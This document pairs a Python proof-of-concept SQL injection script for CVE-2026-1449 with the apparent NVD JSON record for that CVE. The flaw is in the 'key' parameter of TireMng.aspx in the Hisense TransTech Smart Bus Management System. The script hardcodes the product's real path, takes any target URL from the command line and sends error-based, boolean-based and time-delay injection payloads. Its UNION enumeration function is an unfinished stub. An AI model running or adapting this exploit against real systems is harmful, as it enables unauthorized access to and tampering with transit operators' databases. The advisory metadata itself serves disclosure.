CVE-2026-1449

# CVE-2026-1449 SQL Injection PoC # Target: Hisense TransTech Smart Bus Management System # Vulnerability: Page_Load function in TireMng.aspx with unsanitized 'key' parameter import requests import sys target_url = "http://target-server/YZSoft/Forms/XForm/BM/BusComManagement/TireMng.aspx" # Basic SQL Injection test - error-based injection payload_error = "' OR 1=1 --" # Boolean-based blind injection test payload_boolean = "' AND 1=1 --" # Time-based blind injection test payload_time = "'; WAITFOR DELAY '0:0:5' --" def test_sqli(url, payload): """Test SQL injection vulnerability""" params = { 'key': payload } try: response = requests.get(url, params=params, timeout=30) print(f"[+] Sent payload: {payload}") print(f"[+] Status code: {response.status_code}") print(f"[+] Response length: {len(response.text)}") return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None # Database enumeration using UNION-based injection def enumerate_database(url): """Enumerate database information""" # Determine number of columns via ORDER BY for i in range(1, 20): payload = f"' ORDER BY {i} --" # Implementation for column enumeration # UNION-based data extraction union_payload = "' UNION SELECT NULL,NULL,NULL,NULL,@@version--" # Extract database version, user, database name if __name__ == "__main__": if len(sys.argv) > 1: target_url = sys.argv[1] print("[*] Testing CVE-2026-1449 SQL Injection") print(f"[*] Target: {target_url}") # Test different injection techniques test_sqli(target_url, payload_error) test_sqli(target_url, payload_boolean) test_sqli(target_url, payload_time)

{"cve": {"id": "CVE-2026-1449", "sourceIdentifier": "[email protected]", "published": "2026-01-27T00:15:50.790", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Hisense TransTech Smart Bus Management System up to 20260113. Affected is the function Page_Load of the file YZSoft/Forms/XForm/BM/BusComManagement/TireMng.aspx. Executing a manipulation of the argument key can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una falla en el sistema de gestión de autobuses inteligentes Hisense TransTech hasta el 20260113. Afectada es la función Page_Load del archivo YZSoft/Forms/XForm/BM/BusComManagement/TireMng.aspx. La ejecución de una manipulación del argumento key puede llevar a inyección SQL. Es posible lanzar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/master-abc/cve/issues/15", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.342881", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.342881", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.737032", "source": "[email protected]"}]}}